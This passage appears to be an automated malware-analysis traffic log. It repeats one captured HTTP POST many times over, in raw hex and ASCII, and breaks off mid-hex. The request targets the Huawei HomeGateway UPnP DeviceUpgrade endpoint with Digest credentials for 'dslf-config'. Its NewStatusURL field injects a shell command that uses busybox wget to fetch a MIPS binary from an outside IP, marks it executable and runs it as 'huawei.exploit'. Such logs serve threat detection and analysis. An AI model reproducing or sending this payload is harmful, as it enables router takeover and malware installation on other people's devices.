6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 